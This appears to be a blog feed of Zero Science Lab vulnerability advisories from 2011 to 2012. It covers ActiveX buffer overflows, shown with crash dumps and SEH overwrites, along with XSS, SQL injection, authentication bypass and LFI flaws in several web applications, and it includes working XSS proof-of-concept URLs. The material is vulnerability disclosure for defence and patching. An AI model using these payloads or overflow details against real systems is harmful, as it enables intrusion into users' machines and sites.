Zero Science Lab

EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC

zeroscience — Tue, 31 Jan 2012 18:56:23 +0000

The ActiveX suffers from a buffer overflow vulnerability when parsing large amount of bytes to the FtpUploadFile member in FtpUploadFile() function, resulting memory corruption overwriting severeal registers including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code.


--------------------------------------------------------------
CompanyName		EdrawSoft

FileDescription		Edraw Office Viewer Component

FileVersion		5.6.578.1
OriginalFileName		officeviewer.ocx

ProductName		OfficeViewerOCX

ProductVersion		5.6.5781
Report for Clsid: {F6FE8878-54D2-4333-B9F0-FC543B1BE1ED}

RegKey Safe for Script: True

RegKey Safe for Init: True

Implements IObjectSafety: True

IDisp Safe:  Safe for untrusted: caller,data

IPStorage Safe:  Safe for untrusted: caller,data  
Exception Code: ACCESS_VIOLATION

Disasm: 220324CC	MOV [EDI],AX	(officeviewermme.ocx)
Seh Chain:

--------------------------------------------------

1 	410041 	
Called From                   Returns To

--------------------------------------------------

officeviewermme.220324CC      officeviewermme.22026402      
Registers:

--------------------------------------------------

EIP 220324CC

EAX 00000041

EBX 00001015

ECX 000002A0

EDX 001B2E4C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA

EDI 01870000

ESI 0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0186C490 -> 0186C530

ESP 0186C488 -> 00000000
Block Disassembly:

--------------------------------------------------

220324BD	MOV EDI,[EBP+8]

220324C0	MOV ESI,EDI

220324C2	TEST ECX,ECX

220324C4	JE SHORT 220324F7

220324C6	MOV EDX,[EBP+C]

220324C9	MOVZX EAX,WORD PTR [EDX]

220324CC	MOV [EDI],AX	  <--- CRASH

220324CF	INC EDI

220324D0	INC EDI

220324D1	INC EDX

220324D2	INC EDX

220324D3	TEST AX,AX

220324D6	JE SHORT 220324DB

220324D8	DEC ECX

220324D9	JNZ SHORT 220324C9
ArgDump:

--------------------------------------------------

EBP+8	0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA

EBP+12	001B1364 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA

EBP+16	00001014

EBP+20	00000000

EBP+24	000007FC

EBP+28	01761EC0 -> Uni: D5")"
Stack Dump:

--------------------------------------------------

186C488 00 00 00 00 64 13 1B 00 30 C5 86 01 02 64 02 22  [....d........d..]

186C498 18 E5 86 01 64 13 1B 00 14 10 00 00 00 00 00 00  [....d...........]

186C4A8 FC 07 00 00 C0 1E 76 01 18 CD 86 01 18 D5 86 01  [......v.........]

186C4B8 18 ED 86 01 64 13 1B 00 10 CD 86 01 18 E5 86 01  [....d...........]

186C4C8 14 10 00 00 8E 33 1B 00 14 10 00 00 00 00 00 00  [................]
--------------------------------------------------------------
(6c9c.6c70): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000

eip=220324cc esp=0186c488 ebp=0186c490 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx -

officeviewermme!DllRegisterServer+0x23bbe:

220324cc 668907          mov     word ptr [edi],ax        ds:0023:01870000=????

0:004> !exchain

0186fa84: 00410041

Invalid exception stack at 00410041

0:004> d esi

0186e518  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e528  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e538  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e548  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e558  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e568  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e578  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186e588  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0:004> d edx

001b2edc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2eec  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2efc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2f0c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2f1c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2f2c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2f3c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

001b2f4c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0:004> d esp+3000

0186f488  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f498  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4e8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0186f4f8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

0:004> !load msec; !exploitable

Exploitability Classification: EXPLOITABLE

Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)

User mode write access violations that are not near NULL are exploitable.

Advisory ID: ZSL-2012-5069
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php

Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities

zeroscience — Tue, 31 Jan 2012 18:54:06 +0000

MindManager suffers from several vulnerabilities included into the whole package. Several OCX and DLL libraries from 3rd party software (glg.ocx, officeviewermme.ocx, pdfxctrl.dll, vsflex8n.ocx and ChartFX.ClientServer.Core.dll) are vulnerable to buffer overflow and denial of service (IE). Also the application is vulnerable to insecure library loading with every file extension thru ssgp.dll and dwmapi.dll.

Advisory ID: ZSL-2012-5068
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5068.php

Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)

zeroscience — Sun, 29 Jan 2012 03:57:37 +0000

The PDF Printer Preferences ActiveX suffers from a buffer overflow vulnerability. When a large buffer is sent to the sub_path item of the StoreInRegistry function, and the sub_key item of the InitFromRegistry function, in pdfxctrl.dll module, we get a SEH overwrite. An attacker can gain access to the system of the affected node and execute arbitrary code.

Discovered on 25.01.2012 included in Mindjet MindManager 2012 for Windows version 10.0.493.

COMRaider Output:
----------- Exception Code: ACCESS_VIOLATION Disasm: 7C834D8F REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] (KERNEL32.dll)


Seh Chain:

--------------------------------------------------

1 	7C839AC0 	KERNEL32.dll

2 	41414141 	
Called From                   Returns To

--------------------------------------------------

KERNEL32.7C834D8F             pdfxctrl.1001D8E7

pdfxctrl.1001D8E7             41414141                      
Registers:

--------------------------------------------------

EIP 7C834D8F -> Asc: SOFTWARE\Tracker Software\pdf

EAX 0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf

EBX 00000003

ECX 0000008C

EDX 00001815

EDI 0013FFFD -> 41000000

ESI 0013CD74 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0013B780 -> 0013EDE4

ESP 0013B75C -> 0000302A -> Uni: *0*0
Block Disassembly:

--------------------------------------------------

7C834D82	MOV CL,[EDI+1]

7C834D85	INC EDI

7C834D86	TEST CL,CL

7C834D88	JNZ SHORT 7C834D82

7C834D8A	MOV ECX,EDX

7C834D8C	SHR ECX,2

7C834D8F	REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]	  <--- CRASH

7C834D91	MOV ECX,EDX

7C834D93	AND ECX,3

7C834D96	REP MOVS BYTE PTR ES:[EDI],BYTE PTR [ESI]

7C834D98	OR DWORD PTR [EBP-4],FFFFFFFF

7C834D9C	CALL 7C802511

7C834DA1	RETN 8

7C834DA4	NOP

7C834DA5	NOP
ArgDump:

--------------------------------------------------

EBP+8	0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf

EBP+12	0013B790 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP+16	41414141

EBP+20	41414141

EBP+24	41414141

EBP+28	41414141
Stack Dump:

--------------------------------------------------

13B75C 2A 30 00 00 84 63 18 00 03 00 00 00 5C B7 13 00  [.....c......\...]

13B76C 2A 30 00 00 AC F1 13 00 C0 9A 83 7C A8 4D 83 7C  [.............M..]

13B77C 00 00 00 00 E4 ED 13 00 E7 D8 01 10 E0 E9 13 00  [................]

13B78C 90 B7 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]

13B79C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]

-----------

CompanyName Tracker Software Products
FileDescription PDF Printer Preferences ActiveX
FileVersion 3.60.0128
InternalName pdfxctrl.dll
LegalCopyright Copyright © 2001-2006 by Tracker Software Products
OriginalFileName pdfxctrl.dll
ProductName Tracker Software Products pdfxctrl.PdfPrinterPreferences ActiveX
ProductVersion 3.60

Advisory ID: ZSL-2012-5067 (Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH))
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php

Limny 3.0.1 (login.php) Remote URI Based Cross-Site Scripting Vulnerability

zeroscience — Wed, 04 Jan 2012 17:11:46 +0000

Limny suffers from a XSS issue in ‘/admin/login.php’ that uses the ‘PHP_SELF’ variable. The vulnerability is present because there isn’t any filtering to the mentioned variable in the affected script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

——————————————————————————–


/admin/login.php

----------------

100:

——————————————————————————–

Advisory: ZSL-2012-5066

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5066.php

Infoproject Biznis Heroj Multiple Vulnerabilities

zeroscience — Wed, 04 Jan 2012 17:09:51 +0000

Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities

Input passed via the parameters ‘filter’ in ‘widget.dokumenti_lista.php’ and ‘fin_nalog_id’ in ‘nalozi_naslov.php’ script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param ‘config’ in ‘nalozi_naslov.php’ and ‘widget.dokumenti_lista.php’ is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Infoproject Biznis Heroj (login.php) Authentication Bypass Vulnerability

The vulnerability is caused due to an error in the logon authentication script (login.php) and can be exploited to bypass the login procedure by defining the ‘username’ and ‘password’ POST parameters with an SQL Injection attack, gaining admin privileges.

SopCast 3.4.7.45585 Multiple Vulnerabilities

zeroscience — Mon, 05 Dec 2011 03:22:34 +0000

SopCast suffers from a stack-based buffer overflow vulnerability when parsing the user input using the SoP protocol in sopocx.ocx module allowing the attacker to gain system access and execute arbitrary code on the affected machine. The issue is triggered when adding 514 bytes of string to the sop:// protocol (GET), causing the app to open the link (channel) and crashing. The application will crash even with ‘sop://[anything]‘ because it fails to properly sanitize and handle the uri segment, but with exactly 514 bytes the stack gets overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes denial of service scenario. You can also edit the ‘

’ element in the favorites.xml file as the attack vector.

SopCast is also vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the ‘F’ flag (full control) for the ‘Everyone’ group, for the ‘Diagnose.exe’ binary file which is bundled with the SopCast installation package.

Advisories:

ZSL-2011-5062 – SopCast 3.4.7 (Diagnose.exe) Improper Permissions
ZSL-2011-5063 – SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC

Hero Framework 3.69 Remote Reflected Cross-Site Scripting Vulnerability

zeroscience — Thu, 01 Dec 2011 02:54:07 +0000

Hero suffers from a XSS vulnerability when parsing user input to the ‘month’ parameter via GET method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

PoC:


http://localhost/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://localhost/hero_os/events?month=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5061.php

Средновековни фрески во Кумановско [корица]

zeroscience — Wed, 30 Nov 2011 17:14:20 +0000

http://liquidworm.deviantart.com/art/Cvrktlg-271597210

Manx cms.xml Multiple Vulnerabilities

zeroscience — Mon, 28 Nov 2011 15:21:47 +0000

(XSS) Input thru the GET parameters ‘limit’ and ‘search_folder’ in ‘ajax_get_file_listing.php’ are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

(CRLF Injection/HTTP Response Splitting) Input passed to the POST parameter ‘editorChoice’ in ‘admin_blocks.php’ and ‘admin_pages.php’ and the POST parameter ‘theme’ in ‘admin_css.php’, ‘admin_js.php’ and ‘admin_templates.php’ is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which are included in a response sent to the user.

(LFI/DT) Input passed via the ‘fileName’ parameter thru the simplexml_load_file() function is not properly verified in ‘/admin/admin_blocks.php’ and ‘/admin/admin_pages.php’ (post-auth) before being used to load files. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks.

Advisories:
ZSL-2011-5058 – http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5058.php
ZSL-2011-5059 – http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5059.php
ZSL-2011-5060 – http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5060.php

:):

Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability

zeroscience — Sun, 13 Nov 2011 14:51:09 +0000

The CMS suffers from multiple XSS vulnerabilities. Input thru the POST parameters ‘SITE_NAME’ (stored), ‘return’ (reflected) and the GET parameter ‘search’ (reflected) thru Hotaru.php, are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php